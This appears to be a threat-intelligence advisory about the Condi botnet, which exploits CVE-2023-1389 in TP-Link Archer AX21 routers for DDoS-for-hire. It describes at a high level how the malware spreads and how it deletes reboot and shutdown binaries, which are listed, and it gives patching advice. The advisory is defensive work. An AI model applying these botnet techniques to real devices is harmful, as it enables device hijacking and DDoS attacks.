New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks

Cyber Security Threat Summary:
“A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. ‘The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code,’ security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot” (The Hacker News, 2023).

To ensure access is maintained, the botnet will delete the following binaries which are used to show down or reboot the system:

  • /usr/sbin/reboot
  • /usr/bin/reboot
  • /usr/sbin/shutdown
  • /usr/bin/shutdown
  • /usr/sbin/poweroff
  • /usr/bin/poweroff
  • /usr/sbin/halt
  • /usr/bin/halt

    Security Officer Comments:
    Botnets typically will propagate by brute-forcing login attempts in routers or by leveraging known vulnerabilities. In the case of Condi, the botnet comes with a module that checks TP-LINK Archer AX21 devices susceptible to vulnerabilities like CVE-2023-1389, a command injection bug that was previously used by Mirai botnet. If a vulnerable device is found, the botnet will execute a shell script retrieved from a remote server, which will then infect the device with binaries designed to communicate with an attacker-owned C2 server and perform other malicious tasks. Once enough devices have been compromised, the botnet can use the devices to launch power DDoS attacks against targeted websites and services.

    Suggested Correction(s):
    Although this article mentions a specific manufacturer of networking equipment, it may be feasible for organizations to review their software bill of materials, if applicable, regardless of the router brand or version. It's possible that networking equipment may be utilizing WRT or related services to some extent. As a precautionary measure, organizations and users may want to check if an update is available, regardless of the router brand. It's highly likely that numerous devices may be impacted similarly due to their implementation and use of open-source software. Additionally, companies and users should adhere to all system hardening techniques before introducing equipment to production or live environments.

    IOCs:
    https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

    Link(s):
    https://thehackernews.com/2023/06/new-condi-malware-hijacking-tp-link-wi.html